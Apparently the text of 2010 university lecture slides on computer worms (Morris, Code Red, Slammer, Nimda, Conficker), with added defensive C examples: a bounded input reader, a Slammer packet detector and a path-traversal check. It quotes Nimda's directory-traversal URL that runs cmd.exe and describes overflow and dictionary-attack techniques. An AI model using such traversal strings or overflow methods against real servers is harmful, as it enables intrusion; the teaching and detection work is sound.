• Number of slides: 24

Computer Security
CS 426 Lecture 16
Worms

CS 426 Fall 2010/Lecture 16 1

Announcements
• Quiz on Friday October 1
• Guest lecture on Monday October 4
• Guest lecture on Friday October 8

Review of Malware
• Backdoor, logic bomb
• Trojan horse
• Virus
• Worm
• Botnets
• Rootkit: user level, kernel level, under-kernel
• Spyware
• Scareware, ransomware

Morris Worm (November 1988)
• First major worm
• Written by Robert Morris
  – Son of former chief scientist of NSA's National Computer Security Center

What comes next: 1 11 21 1211 111221 ?

Morris Worm Description
• Two parts
  – Main program to spread worm
    • look for other machines that could be infected
    • try to find ways of infiltrating these machines
  – Vector program (99 lines of C)
    • compiled and run on the infected machines
    • transferred main program to continue attack

Vector 1: Debug feature of sendmail
• Sendmail
  – Listens on port 25 (SMTP port)
  – Some systems back then compiled it with DEBUG option on
• Debug feature gives
  – The ability to send a shell script and execute it on the host

Vector 2: Exploiting fingerd
• Finger output

arthur.cs.purdue.edu% finger ninghui
Login name: ninghui                     In real life: Ninghui Li
Directory: /homes/ninghui               Shell: /bin/csh
Since Sep 28 14:36:12 on pts/15 from csdhcp-120-173 (9 seconds idle)
New mail received Tue Sep 28 14:36:04 2010; unread since Tue Sep 28 14:36:05 2010
No Plan.

Vector 2: Exploiting fingerd
• Fingerd
  – Listens on port 79
• It uses the function gets
  – Fingerd expects an input string
  – Worm writes a long string into an internal 512-byte buffer
• Overwrites the return address to jump to shell code
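The slide's point is the unbounded read: gets() copies until a newline no matter how large the 512-byte buffer is. The following is an added example, not lecture or BSD fingerd code. The 512-byte size comes from the slide; the connection stand-in (struct conn), the function names and the 700-byte request are ours. The unbounded reader is included only to show the pattern a reviewer should look for, and is run here only on input that fits; the bounded reader is the replacement that also drains the rest of an over-long line so it cannot be misread as a second request.

```c
#include <stdio.h>
#include <string.h>

#define LINE_BUF 512   /* the buffer size the slide gives for fingerd */

/* Stand-in for the network connection: a byte source we pull one char from. */
struct conn { const char *data; size_t len; size_t pos; };

static int conn_getc(struct conn *c)
{
    return c->pos < c->len ? (unsigned char)c->data[c->pos++] : EOF;
}

/* Same defect as gets(): copies until newline or EOF with no bound at all.
 * A request longer than the array runs past it and over the saved return
 * address, which is exactly what the slide describes. */
static void read_request_unbounded(struct conn *c, char *buf)
{
    int ch;
    while ((ch = conn_getc(c)) != EOF && ch != '\n')
        *buf++ = (char)ch;
    *buf = '\0';
}

/* Bounded reader: stores at most size-1 bytes, always NUL-terminates, and
 * discards the remainder of an over-long line. Returns 1 for a line that
 * fit, -1 if it was truncated, 0 if there was no input at all. */
static int read_request_bounded(struct conn *c, char *buf, size_t size)
{
    size_t n = 0;
    int ch, truncated = 0, got_any = 0;
    while ((ch = conn_getc(c)) != EOF && ch != '\n') {
        got_any = 1;
        if (n + 1 < size)
            buf[n++] = (char)ch;
        else
            truncated = 1;
    }
    buf[n] = '\0';
    if (!got_any && ch == EOF) return 0;
    return truncated ? -1 : 1;
}

/* Constructed request of 700 'A's, well past the 512-byte buffer. Returns the
 * number of bytes actually stored (511) if the reader reported truncation. */
static int demo_long_request(void)
{
    char big[701];
    memset(big, 'A', 700);
    big[700] = '\n';
    struct conn c = { big, 701, 0 };
    char buf[LINE_BUF];
    int r = read_request_bounded(&c, buf, sizeof buf);
    return r == -1 ? (int)strlen(buf) : -1;
}

/* A request that fits: bounded reader returns 1 and the name is intact. */
static int demo_short_request_ok(void)
{
    const char *line = "ninghui\n";
    struct conn c = { line, strlen(line), 0 };
    char buf[LINE_BUF];
    return read_request_bounded(&c, buf, sizeof buf) == 1 && strcmp(buf, "ninghui") == 0;
}

/* The gets-style reader is safe here only because the line fits. */
static int demo_unbounded_fits(void)
{
    const char *line = "ninghui\n";
    struct conn c = { line, strlen(line), 0 };
    char buf[LINE_BUF];
    read_request_unbounded(&c, buf);
    return strcmp(buf, "ninghui") == 0;
}

int main(void)
{
    printf("short request ok: %d\n", demo_short_request_ok());
    printf("700-byte request: stored %d bytes, remainder discarded\n", demo_long_request());
    return 0;
}
```

The bounded reader keeps the "one request per line" framing intact: after truncation it reads to the newline and throws the tail away, so the attacker's overflow bytes never reach a second parse.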

Vector 3: Exploiting Trust in Remote Login
• Remote login on UNIX
  – rlogin, rsh
• Trusting mechanism
  – Trusted machines have the same user accounts
  – Users from trusted machines
  – /etc/hosts.equiv – system-wide trusted hosts file
  – /.rhosts and ~/.rhosts – users' trusted hosts files

[Diagram: host aaa.xyz.com lists bbb.xyz.com in its /etc/hosts.equiv; user alice on host bbb.xyz.com uses rlogin to reach aaa.xyz.com]

Vector 3: Exploiting Trust in Remote Login
• Worm exploited trust information
  – Examining trusted hosts files
  – Assume reciprocal trust
    • If X trusts Y, then maybe Y trusts X
• Password cracking
  – Worm coming in through fingerd was running as daemon (not root), so it needed to break into user accounts to use the .rhosts feature
  – Read /etc/passwd, used ~400 common password strings & the local dictionary to do a dictionary attack

Other Features of the Worm
• Program is shown as 'sh' in ps
• Files didn't show up in ls
• Finds targets using several mechanisms:
  • 'netstat -r -n', /etc/hosts, …
• Compromises multiple hosts in parallel
  – When the worm successfully connects, it forks a child to continue the infection while the parent keeps trying new hosts
• Worm has no malicious payload
• Where does the damage come from?

Damage
• One host may be repeatedly compromised
• Supposedly designed to gauge the size of the Internet
• The following bug made it more damaging:
  • Asks a host whether it is already compromised; however, even if it answers yes, still compromises it with probability 1/8.

Increasing propagation speed
• Code Red, July 2001
  – Affects Microsoft Index Server 2.0,
    • Windows 2000 Indexing service on Windows NT 4.0,
    • Windows 2000 that run IIS 4.0 and 5.0 Web servers
  – Exploits known buffer overflow in Idq.dll
  – Vulnerable population (360,000 servers) infected in 14 hours
• SQL Slammer, January 2003
  – Affects Microsoft SQL 2000
  – Exploits known buffer overflow vulnerability
    • Server Resolution service vulnerability reported June 2002
    • Patch released in July 2002, Bulletin MS02-039
  – Vulnerable population infected in less than 10 minutes

Slammer Worm (Jan. 2003)
• MS SQL Server 2000 receives a request from the worm
  – SQLSERVR.EXE process listens on UDP port 1434

[Diagram: UDP packet delivered to the SQLSERVR.EXE process of SQL Server 2000]

Slammer's code is 376 bytes!

[Annotated hex dump of the Slammer packet; only the first line of the dump and the slide's annotations survive extraction]
0000: 4500 0194 b6db 0000 6d11 2e2d 89e5 0a9c

Annotations on the dump:
• UDP packet header
• This byte signals the SQL Server to store the contents of the packet in the buffer
• The 0x01 characters overflow the buffer and spill into the stack, right up to the return address
• This value overwrites the return address and points it to a location in sqlsort.dll, which effectively jumps to %esp
• This is the first instruction to get executed. It jumps to here.
• NOP slide
• Restore payload, set up socket structure, and get the seed for the random number generator
• Main loop of Slammer: generate new random IP address, push arguments onto stack, call send method, loop around
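The dump gives a defender everything needed for a cheap network signature: a UDP datagram to port 1434 whose body is 376 bytes, starts with the 0x04 "store this in the buffer" byte and is followed by a long run of 0x01 padding. The code below is an added example, not lecture code or any product's rule. The port, body length, leading byte and 0x01 padding come from the slide; the first sixteen IP header bytes are copied from the slide's first dump line; the destination address, source port, omitted checksums, the 64-byte minimum padding run and the 0xAA filler standing in for the rest of the body are all constructed for the example and are not the worm's code.

```c
#include <stdio.h>
#include <stdint.h>
#include <stddef.h>
#include <string.h>

#define SSRP_PORT        1434   /* UDP port SQLSERVR.EXE listens on (slide) */
#define SLAMMER_BODY_LEN 376    /* worm body length (slide) */
#define MIN_PAD_RUN      64     /* assumption: real SSRP queries never pad like this */

enum verdict { NOT_UDP_1434 = 0, BENIGN_SSRP = 1, LOOKS_LIKE_SLAMMER = 2 };

static uint16_t be16(const uint8_t *p) { return (uint16_t)((p[0] << 8) | p[1]); }

/* Classify one raw IPv4 datagram: parse IP and UDP headers, then look at the
 * SSRP body for the 0x04 lead byte followed by a long 0x01 run. */
enum verdict classify_datagram(const uint8_t *pkt, size_t len)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return NOT_UDP_1434;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 8 || pkt[9] != 17) return NOT_UDP_1434; /* 17 = UDP */
    const uint8_t *udp = pkt + ihl;
    if (be16(udp + 2) != SSRP_PORT) return NOT_UDP_1434;
    size_t udp_len = be16(udp + 4);
    if (udp_len < 8 || udp_len > len - ihl) return NOT_UDP_1434;
    const uint8_t *body = udp + 8;
    size_t body_len = udp_len - 8;

    if (body_len == 0 || body[0] != 0x04) return BENIGN_SSRP;
    size_t run = 0;
    while (1 + run < body_len && body[1 + run] == 0x01) run++;
    if (body_len == SLAMMER_BODY_LEN && run >= MIN_PAD_RUN) return LOOKS_LIKE_SLAMMER;
    return BENIGN_SSRP;
}

/* Wrap a body in an IPv4/UDP datagram to port 1434. The first 16 header bytes
 * are the slide's dump line (total length is recomputed); the destination
 * address 10.0.0.5, source port and zero checksums are constructed. */
static size_t build_datagram(uint8_t *out, const uint8_t *body, size_t body_len)
{
    static const uint8_t ip_prefix[16] = {
        0x45, 0x00, 0x01, 0x94, 0xb6, 0xdb, 0x00, 0x00,   /* v4, IHL 5, len 404 */
        0x6d, 0x11, 0x2e, 0x2d, 0x89, 0xe5, 0x0a, 0x9c }; /* TTL, UDP, csum, src */
    size_t total = 20 + 8 + body_len;
    memcpy(out, ip_prefix, 16);
    out[2] = (uint8_t)(total >> 8); out[3] = (uint8_t)total;
    out[16] = 10; out[17] = 0; out[18] = 0; out[19] = 5;
    uint8_t *udp = out + 20;
    udp[0] = 0x10; udp[1] = 0x52;                                  /* src port */
    udp[2] = (uint8_t)(SSRP_PORT >> 8); udp[3] = (uint8_t)SSRP_PORT;
    udp[4] = (uint8_t)((8 + body_len) >> 8); udp[5] = (uint8_t)(8 + body_len);
    udp[6] = 0; udp[7] = 0;                                        /* checksum */
    memcpy(udp + 8, body, body_len);
    return total;
}

/* Constructed worm-shaped body: 0x04, 96 bytes of 0x01, then 0xAA filler
 * (not the real code) up to the slide's 376-byte length. */
static int demo_worm_shaped(void)
{
    uint8_t body[SLAMMER_BODY_LEN], pkt[20 + 8 + SLAMMER_BODY_LEN];
    body[0] = 0x04;
    memset(body + 1, 0x01, 96);
    memset(body + 97, 0xaa, SLAMMER_BODY_LEN - 97);
    return classify_datagram(pkt, build_datagram(pkt, body, sizeof body));
}

/* Constructed ordinary SSRP query: 0x04 plus a short instance name. */
static int demo_benign_query(void)
{
    const uint8_t body[] = { 0x04, 'M','S','S','Q','L','S','E','R','V','E','R', 0 };
    uint8_t pkt[20 + 8 + sizeof body];
    return classify_datagram(pkt, build_datagram(pkt, body, sizeof body));
}

/* Same worm-shaped body sent to UDP/53: outside the rule's scope. */
static int demo_wrong_port(void)
{
    uint8_t body[SLAMMER_BODY_LEN], pkt[20 + 8 + SLAMMER_BODY_LEN];
    body[0] = 0x04;
    memset(body + 1, 0x01, SLAMMER_BODY_LEN - 1);
    size_t n = build_datagram(pkt, body, sizeof body);
    pkt[22] = 0; pkt[23] = 53;
    return classify_datagram(pkt, n);
}

int main(void)
{
    printf("worm-shaped=%d benign=%d wrong-port=%d\n",
           demo_worm_shaped(), demo_benign_query(), demo_wrong_port());
    return 0;
}
```

Note that 0x0194 in the slide's IP header is 404 bytes, which is exactly 20 (IP) + 8 (UDP) + 376 (body), so the length check is consistent with the slide's own numbers. A rule this narrow misses variants, but it is the kind of check that, together with a per-host UDP rate limit, would have flagged the traffic within the first seconds of the outbreak.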

Nimda worm (September 18, 2001)
• Key Vulnerability to Exploit
  – Microsoft Security Bulletin (MS01-020): March 29, 2001
  – A logic bug in IE's rendering of HTML
  – Specially crafted HTML email can cause the launching of an embedded email
• Vector 1: e-mails itself as an attachment (every 10 days)
  • runs once viewed in the preview pane
• Vector 2: copies itself to shared disk drives on networked PCs
• Why may this lead to propagation to other hosts?

Nimda Worm
• Vector 3: Exploits various IIS directory traversal vulnerabilities
  – Use a crafted URL to cause a command to execute at
  – Example of a directory traversal attack:
    • http://address.of.iis5.system/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:
• Vector 4: Exploit backdoors left by earlier worms
• Vector 5: Appends JavaScript code to Web pages
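The lesson of the traversal URL above is ordering: the server checked for ".." before it finished decoding, and "%c1%1c" only became a path separator afterwards. The following is an added example, not lecture or IIS code, showing the defensive order: percent-decode, validate the bytes as UTF-8 (rejecting overlong sequences such as C1 1C outright), and only then look for ".." segments. The function names, the 512-byte limits and the sample paths other than the slide's URL are ours; the query string is left attached since it cannot change the verdict.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

enum path_verdict { PATH_OK = 0, PATH_BAD_ENCODING = 1, PATH_TRAVERSAL = 2 };

static int hexval(int c)
{
    if (c >= '0' && c <= '9') return c - '0';
    if (c >= 'a' && c <= 'f') return c - 'a' + 10;
    if (c >= 'A' && c <= 'F') return c - 'A' + 10;
    return -1;
}

/* Step 1: percent-decode once into raw bytes. Returns byte count or -1. */
static int percent_decode(const char *in, uint8_t *out, size_t cap)
{
    size_t n = 0;
    for (; *in; in++) {
        int b = (unsigned char)*in;
        if (b == '%') {
            int hi = hexval(in[1]), lo = in[1] ? hexval(in[2]) : -1;
            if (hi < 0 || lo < 0) return -1;
            b = hi * 16 + lo;
            in += 2;
        }
        if (n >= cap) return -1;
        out[n++] = (uint8_t)b;
    }
    return (int)n;
}

/* Step 2: validate UTF-8 and map it to ASCII for the path check. Accepts ASCII
 * and well-formed 2- and 3-byte sequences; rejects overlong forms such as the
 * slide's C1 1C, which a lenient decoder could read as '/'. Non-ASCII
 * characters become '?' because they can never be '.' or a separator. */
static int utf8_to_ascii(const uint8_t *in, int n, char *out, size_t cap)
{
    size_t o = 0;
    for (int i = 0; i < n; ) {
        uint8_t b = in[i];
        int need;
        if (b < 0x80) need = 0;
        else if (b >= 0xC2 && b <= 0xDF) need = 1;
        else if (b >= 0xE0 && b <= 0xEF) need = 2;
        else return -1;                       /* C0, C1, 4-byte and stray bytes */
        if (need && i + need >= n) return -1;
        for (int k = 1; k <= need; k++)
            if ((in[i + k] & 0xC0) != 0x80) return -1;
        if (need == 2 && b == 0xE0 && in[i + 1] < 0xA0) return -1;  /* overlong */
        if (o + 1 >= cap) return -1;
        out[o++] = need ? '?' : (char)b;
        i += need + 1;
    }
    out[o] = '\0';
    return (int)o;
}

/* Step 3: walk the fully decoded path. '/' and '\' both separate segments on
 * Windows-style servers; any ".." segment is a traversal attempt. */
static enum path_verdict check_request_path(const char *url_path)
{
    uint8_t raw[512];
    char ascii[512];
    int n = percent_decode(url_path, raw, sizeof raw);
    if (n < 0 || utf8_to_ascii(raw, n, ascii, sizeof ascii) < 0)
        return PATH_BAD_ENCODING;
    const char *p = ascii;
    while (*p) {
        const char *seg = p;
        while (*p && *p != '/' && *p != '\\') p++;
        if (p - seg == 2 && seg[0] == '.' && seg[1] == '.')
            return PATH_TRAVERSAL;
        if (*p) p++;
    }
    return PATH_OK;
}

int main(void)
{
    const char *slide_url = "/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir+c:";
    printf("%s -> %d\n", slide_url, check_request_path(slide_url));
    printf("/scripts/index.asp -> %d\n", check_request_path("/scripts/index.asp"));
    return 0;
}
```

The slide's URL is rejected at step 2 as bad encoding, before any path logic runs; a plainer "%2e%2e" or "%2f" variant decodes to ".." and is caught at step 3. Either way the check sees the same bytes the file system will see, which is the property the vulnerable servers lacked.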

Nimda worm
• Nimda worm also
  – enables the sharing of the C: drive as C$
  – creates a "Guest" account on Windows NT and 2000 systems
  – adds this account to the "Administrator" group
• 'Nimda fix' Trojan disguised as a security bulletin
  – claims to be from SecurityFocus and TrendMicro
  – comes in a file named FIX_NIMDA.exe
    • TrendMicro calls their free Nimda removal tool FIX_NIMDA.com

Research Worms
• Warhol Worms – infect all vulnerable hosts in 15 minutes to 1 hour
  – optimized scanning
    • initial hit list of potentially vulnerable hosts
    • local subnet scanning
    • permutation scanning for complete, self-coordinated coverage
  – see paper by Nicholas Weaver
• Flash Worms – infect all vulnerable hosts in 30 seconds
  – determine complete hit list of servers with the relevant service open and include it with the worm
  – see paper by Stuart Staniford, Gary Grim, Roelof Jonkman, Silicon Defense
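Why a hit list turns a ten-minute worm into a one-minute worm, and a complete hit list into a "flash" worm, follows from the simple random-scanning model used in the research above: each infected host sends s scans per second at uniformly random IPv4 addresses, and a scan creates a new infection only when it lands on a vulnerable host not yet infected, so the expected new infections per second are I·s·(V−I)/2^32. The code below is an added example, not from the lecture or from the Weaver or Staniford papers; it steps that recurrence one second at a time. The parameter values (75,000 vulnerable hosts, 4,000 scans per second per host, a 10,000-host hit list) are illustrative assumptions chosen to land in the "less than 10 minutes" range the earlier slide reports for Slammer, not measured figures.

```c
#include <stdio.h>

#define IPV4_SPACE 4294967296.0   /* 2^32 addresses */

/* Seconds (whole-second steps) until at least frac*V hosts are infected,
 * starting from i0 already-infected hosts (the hit list). Returns 0 if the
 * hit list already covers the target fraction, -1 if nothing is infected
 * to begin with, so the outbreak never starts. */
static double seconds_to_infect(double V, double s, double i0, double frac)
{
    if (i0 <= 0) return -1;
    double I = i0, t = 0;
    while (I < frac * V) {
        I += I * s * (V - I) / IPV4_SPACE;   /* expected new infections */
        t += 1;
    }
    return t;
}

/* Ratio of time-to-90% for a single seed versus a hit list of n hosts. */
static double hitlist_speedup(double V, double s, double n)
{
    double single = seconds_to_infect(V, s, 1, 0.9);
    double listed = seconds_to_infect(V, s, n, 0.9);
    return listed > 0 ? single / listed : -1;
}

int main(void)
{
    const double V = 75000, s = 4000;   /* assumed, illustrative values */
    printf("random scanning from 1 host:      %.0f s to 90%%\n",
           seconds_to_infect(V, s, 1, 0.9));
    printf("Warhol-style 10,000-host hit list: %.0f s to 90%%\n",
           seconds_to_infect(V, s, 10000, 0.9));
    printf("flash worm, full hit list:         %.0f s to 90%%\n",
           seconds_to_infect(V, s, V, 0.9));
    printf("slow scanner, 10 scans/s, 360,000 hosts: %.0f s to 90%%\n",
           seconds_to_infect(360000, 10, 1, 0.9));
    return 0;
}
```

The growth rate is s·V/2^32, so the time from a single seed to saturation scales with ln(V) divided by that rate; the hit list removes the slow early phase, which is most of the total, and a complete list removes it entirely. The same model is what containment work uses to estimate how fast a detector must react to matter.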

Storm botnet
• First detected in Jan 2007
• Vectors (primarily social engineering):
  – Email attachments
  – Download program to show a video
  – Drive-by exploits
• DDoS against spam-fighting sites, and against whichever host is discovered to be investigating the botnet
• Peer-to-peer communications among bots
  – for asking for the C&C server

Conficker (November 2008)
• Also known as Downup, Downadup and Kido.
• Five variants
  – A (2008-11-21); B (2008-12-29); C (2009-02-20)
  – D (2009-03-04); E (2009-04-07)
• Estimated between 9 and 15 million computers are compromised
• Microsoft offers $250,000 reward to catch the creator
• Highly secure mechanism for updating itself.
• Several self-defense mechanisms
  – Disables several security-critical programs
  – Disables DNS lookups related to anti-virus vendors, and Windows Update

Conficker
• Vector 1: Vulnerability in (MS08-067)
  – Bulletin October 23, 2008
  – Vulnerability in MS Server service
  – Exploited by remote RPC request
  – Leads to code execution without authentication
• Vector 2: Dictionary attack on ADMIN$ share
• Vector 3: Creates DLL-based AutoRun trojan on attached removable drives

Why is it able to compromise more hosts than SQL Slammer & Code Red?

Readings for This Lecture
• Wikipedia
  • Morris Worm
  • Conficker

Coming Attractions …
• Dealing with Malware